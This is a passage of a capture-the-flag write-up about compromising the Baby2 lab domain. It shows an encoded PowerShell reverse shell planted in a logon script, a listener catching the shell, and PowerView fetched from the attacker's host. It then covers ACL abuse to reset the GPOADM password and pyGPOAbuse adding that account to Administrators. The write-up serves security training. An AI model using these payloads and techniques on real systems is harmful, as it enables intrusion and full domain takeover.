cmdshell.run "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAwADQAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

After about a minute, I get a shell at my listening nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.194.134 54175

PS C:\Windows\system32> whoami
baby2\amelia.griffiths

The user flag is at the root of C::

PS C:\> cat user.txt
42783b2c************************

Auth as GPOADM

Enumeration

Filesystem

There are no other meaningful users in C:\Users, and no files of interest in the Ameria.Grifiths user’s home directory.

The C: looks very standard:

PS C:\> ls

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         4/16/2025   2:27 AM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/16/2025   1:51 AM                Program Files
d-----         8/22/2023  10:30 AM                Program Files (x86)
d-----         8/22/2023   1:10 PM                shares
d-----         8/22/2023  12:35 PM                temp
d-r---         8/22/2023  12:54 PM                Users
d-----         8/20/2025   9:05 AM                Windows
-a----         4/16/2025   2:48 AM             32 user.txt  

Permissions

Amelia.Griffiths is in a couple non-standard groups, office and legacy:

PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes                                        
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users               Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only                          
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
BABY2\office                               Group            S-1-5-21-213243958-1766259620-4276976267-1104 Mandatory group, Enabled by default, Enabled group
BABY2\legacy                               Group            S-1-5-21-213243958-1766259620-4276976267-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192   

Back in the BloodHound data, the legacy group provides useful outbound control to Amelia.Griffiths::

image-20250926095613071

As a member of the legacy group, Amelia.Griffiths has WriteOwner and WriteDacl over both the GPOADM group and the GPO-Management OU.

Change Password

Lately I’ve shown a lot of cases of updating a password from my host. Here I don’t have creds for Amelia.Griffiths, so I’ll need to do it from BabyTwo. I’ll grab a copy of powerview and host it on a Python webserver on my VM. I can fetch it to BabyTwo and import it:

PS C:\programdata> curl 10.10.14.204/PowerView.ps1 -outfile PowerView.ps1
PS C:\programdata> . .\PowerView.ps1

Now I’ll give Amelia.Griffiths permissions over the GPOADM account, and then set the password:

PS C:\programdata> Add-DomainObjectAcl -Rights all -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths
PS C:\programdata> $cred = ConvertTo-SecureString '0xdf0xdf.' -AsPlainText -Force
PS C:\programdata> Set-DomainUserPassword GPOADM -AccountPassword $cred

It works:

oxdf@hacky$ netexec smb dc.baby2.vl -u GPOADM -p 0xdf0xdf.
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\GPOADM:0xdf0xdf.

Shell as Administrators Group

Enumeration

The GPOADM account has GenericAll over two group policy objects (GPOs):

image-20250926101020441

These are marked as high value objects as they give full control over the domain. I need the GPO ID, which BloodHound gives:

image-20250926102429122

Exploit GPO

I’ll use the pyGPOAbuse tool to get execution from a GPO. I’ll clone it to my host and make sure it has the metadata to run with uv:

oxdf@hacky$ git clone https://github.com/Hackndo/pyGPOAbuse.git
Cloning into 'pyGPOAbuse'...
remote: Enumerating objects: 127, done.
remote: Counting objects: 100% (90/90), done.
remote: Compressing objects: 100% (41/41), done.
remote: Total 127 (delta 63), reused 64 (delta 49), pack-reused 37 (from 1)
Receiving objects: 100% (127/127), 1.14 MiB | 9.36 MiB/s, done.
Resolving deltas: 100% (69/69), done.
oxdf@hacky$ cd pyGPOAbuse/

oxdf@hacky$ uv add --script pygpoabuse.py -r requirements.txt
Updated `pygpoabuse.py`

I need to feed the script auth for the user who can edit GPOs, the GPO id, and the command to run:

oxdf@hacky$ uv run --script pygpoabuse.py baby2.vl/GPOADM:0xdf0xdf. -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -command 'net localgroup administrators GPOADM /add' -f
[+] ScheduledTask TASK_0f3ad190 created!

After a few seconds, GPOADM is in the Administrators group:

PS C:\programdata> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
gpoadm
library
The command completed successfully.

Now netexec shows “Pwn3d!” as well:

oxdf@hacky$ netexec smb dc.baby2.vl -u GPOADM -p 0xdf0xdf.
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\GPOADM:0xdf0xdf. (Pwn3d!)

Shell

I’ll use evil-winrm-py to get a shell:

oxdf@hacky$ evil-winrm-py -i dc.baby2.vl -u GPOADM -p 0xdf0xdf.
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'dc.baby2.vl:5985' as 'GPOADM'
evil-winrm-py PS C:\Users\gpoadm\Documents>

And the flag:

evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
29350096************************